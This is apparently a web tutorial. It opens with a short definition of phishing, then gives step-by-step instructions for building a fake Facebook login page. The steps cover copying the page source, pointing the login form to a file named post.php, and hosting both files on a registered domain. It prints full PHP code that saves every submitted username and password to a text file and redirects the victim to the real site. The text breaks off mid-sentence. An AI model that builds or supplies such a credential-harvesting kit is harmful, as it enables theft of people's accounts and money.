                     What is Phishing?

Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware.Phishing is typically carried out by e-mail spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineeringtechniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.
A phishing technique was described in detail in 1987, and (according to its creator) the first recorded use of the term "phishing" was made in 1995. The term is a variant of fishing, probably influenced by phreaking, and alludes to "baits" used in hopes that the potential victim will "bite" by clicking a malicious link or opening a malicious attachment, in which case their financial information and passwords may then be stolen.

Let's Start:

1. Go to www.facebook.com and right click anywhere on main Facebook page and select <View page source>

2. You will get the view of source code as following .Select it all and copy it.

3. Paste the copied source code in Notepad.Go to top of the page and hit <Ctrl + F>  and find  <action>.Now select the URL address and replace it with <post.php>

4.Save this file on desktop with name ‘index.html‘ .Open that file(index.html) and notice that  page will look like original Facebook page but the address in address bar shows that this page exists on your desktop.
5. Now you have to create the <post.php> file.Open a new Notepad Window and paste the following code:
<?php
header ('Location:http:/www.facebook.com');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
                            And save it with name <post.php>.

You have to publish it over the internet.
First,you have to register your own domain with some hosting space.After that upload
 <index.html> and <post.php> .The URL of our Facebook phishing page
